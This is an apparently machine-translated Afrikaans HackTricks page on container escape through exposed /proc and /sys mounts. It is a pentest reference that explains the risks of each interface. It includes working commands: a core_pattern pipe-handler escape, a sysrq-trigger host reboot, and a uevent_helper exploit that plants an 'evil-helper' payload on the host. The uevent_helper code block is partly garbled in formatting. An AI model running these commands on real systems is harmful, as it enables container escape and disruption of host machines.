Sensitive Mounts

Ondersteun HackTricks

Die blootstelling van /proc en /sys sonder behoorlike naamsruimte-isolasie stel aansienlike sekuriteitsrisiko's in, insluitend aanvalsvlakvergroting en inligtingsoffening. Hierdie gids bevat sensitiewe lêers wat, indien verkeerd gekonfigureer of deur 'n ongemagtigde gebruiker benader, kan lei tot die ontsnapping van die houer, aanpassing van die gasheer, of inligting kan verskaf wat verdere aanvalle kan ondersteun. Byvoorbeeld, die verkeerde montering van -v /proc:/host/proc kan AppArmor-beskerming omseil as gevolg van sy padgebaseerde aard, wat /host/proc onbeskerm agterlaat.

Verdere besonderhede oor elke potensiële kwesbaarheid kan gevind word in https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts.

procfs Kwesbaarhede

/proc/sys

Hierdie gids maak toegang moontlik om kernelveranderlikes te wysig, gewoonlik via sysctl(2), en bevat verskeie subgidse van belang:

/proc/sys/kernel/core_pattern

  • Beskryf in core(5).

  • Maak dit moontlik om 'n program te definieer om uit te voer wanneer 'n kernlêer gegenereer word met die eerste 128 byte as argumente. Dit kan lei tot kode-uitvoering as die lêer begin met 'n pyp |.

  • Toets- en Uitbuitingvoorbeeld:

[ -w /proc/sys/kernel/core_pattern ] && echo Ja # Toets skryftoegang
cd /proc/sys/kernel
echo "|$overlay/shell.sh" > core_pattern # Stel aangepaste hanterer in
sleep 5 && ./crash & # Trigger hanterer

/proc/sys/kernel/modprobe

  • In diepte beskryf in proc(5).

  • Bevat die pad na die kernelmodulelaaier, aangeroep vir die laai van kernelmodules.

  • Toegangkontrole-voorbeeld:

ls -l $(cat /proc/sys/kernel/modprobe) # Kontroleer toegang tot modprobe

/proc/sys/vm/panic_on_oom

  • Verwys in proc(5).

  • 'n Globale vlag wat beheer of die kernel paniekerig word of die OOM-killer aanroep wanneer 'n OOM-toestand voorkom.

/proc/sys/fs

  • Volgens proc(5), bevat opsies en inligting oor die lêersisteem.

  • Skryftoegang kan verskeie ontkenning-van-diens-aanvalle teen die gasheer moontlik maak.

/proc/sys/fs/binfmt_misc

  • Maak dit moontlik om tolke vir nie-inheemse binêre formate te registreer op grond van hul toorgetal.

  • Kan lei tot bevoorregte eskalasie of toegang tot die root-skoot as /proc/sys/fs/binfmt_misc/register skryfbaar is.

  • Relevant uitbuiting en verduideliking:

  • Diepgaande handleiding: Video skakel

Ander in /proc

/proc/config.gz

  • Kan die kernelkonfigurasie onthul as CONFIG_IKCONFIG_PROC geaktiveer is.

  • Nuttig vir aanvallers om kwesbaarhede in die lopende kernel te identifiseer.

/proc/sysrq-trigger

  • Maak dit moontlik om Sysrq-opdragte aan te roep, wat moontlik onmiddellike stelselherlaaie of ander kritieke aksies kan veroorsaak.

  • Gasheerherlaaivoorbeeld:

echo b > /proc/sysrq-trigger # Herlaai die gasheer

/proc/kmsg

  • Stel kernelringbufferboodskappe bloot.

  • Kan help met kernel-uitbuitings, adreslekke, en die voorsiening van sensitiewe stelselinligting.

/proc/kallsyms

  • Lys kernel-uitgevoerde simbole en hul adresse.

  • Essensieel vir die ontwikkeling van kernel-uitbuitings, veral vir die oorkom van KASLR.

  • Adresinligting is beperk met kptr_restrict ingestel op 1 of 2.

  • Besonderhede in proc(5).

/proc/[pid]/mem

  • Skakel met die kernelgeheue-toestel /dev/mem.

  • Histories vatbaar vir bevoorregte eskalasie-aanvalle.

  • Meer oor proc(5).

/proc/kcore

  • Verteenwoordig die stelsel se fisiese geheue in ELF-kernformaat.

  • Lees kan gasheerstelsel- en ander houergeheue-inhoud uitlek.

  • 'n Groot lêergrootte kan lei tot leesprobleme of sagtewarestortings.

  • Gedetailleerde gebruik in Dumping /proc/kcore in 2019.

/proc/kmem

  • Alternatiewe koppelvlak vir /dev/kmem, wat die kernel virtuele geheue verteenwoordig.

  • Maak lees en skryf moontlik, dus direkte aanpassing van kernelgeheue.

/proc/mem

  • Alternatiewe koppelvlak vir /dev/mem, wat fisiese geheue verteenwoordig.

  • Maak lees en skryf moontlik, aanpassing van alle geheue vereis die oplossing van virtuele na fisiese adresse.

/proc/sched_debug

  • Gee prosesbeplanningsinligting terug, wat PID-naamsruimtebeskerming omseil.

  • Stel prosesname, ID's, en cgroup-identifiseerders bloot.

/proc/[pid]/mountinfo

  • Verskaf inligting oor koppelvlakpunte in die proses se koppelvlaknaamsruimte.

  • Stel die ligging van die houer rootfs of beeld bloot.

/sys Kwesbaarhede

/sys/kernel/uevent_helper

  • Gebruik vir die hanteer van kerneltoestel uevents.

  • Skryf na /sys/kernel/uevent_helper kan arbitrêre skripte uitvoer wanneer uevent-triggers plaasvind.

  • Voorbeeld vir Uitbuiting: %%%bash

Skep 'n lading

echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper

Vind gasheerpad van OverlayFS-koppelpunt vir houer

host_path=$(sed -n 's/.\perdir=([^,]).*/\1/p' /etc/mtab)

Stel uevent_helper in op skadelike helper

echo "$host_path/evil-helper" > /sys/kernel/uevent_helper

Trigger 'n uevent

echo change > /sys/class/mem/null/uevent

Lees die uitset

cat /output %%%

/sys/class/thermal

  • Beheer temperatuurinstellings, moontlik veroorsaak DoS aanvalle of fisiese skade.

/sys/kernel/vmcoreinfo

  • Lek kernel adresse, moontlik kompromitteer KASLR.

/sys/kernel/security

  • Bevat securityfs koppelvlak, wat konfigurasie van Linux Security Modules soos AppArmor moontlik maak.

  • Toegang kan 'n houer in staat stel om sy MAC-stelsel uit te skakel.

/sys/firmware/efi/vars en /sys/firmware/efi/efivars

  • Blootstelling van koppelvlakke vir interaksie met EFI veranderlikes in NVRAM.

  • Verkeerde konfigurasie of uitbuiting kan lei tot gebreekte draagbare rekenaars of onopstartbare gasheer-masjiene.

/sys/kernel/debug

  • debugfs bied 'n "geen reëls" foutopsporingskoppelvlak na die kernel.

  • Geskiedenis van sekuriteitskwessies as gevolg van sy onbeperkte aard.

Verwysings

Ondersteun HackTricks

Last updated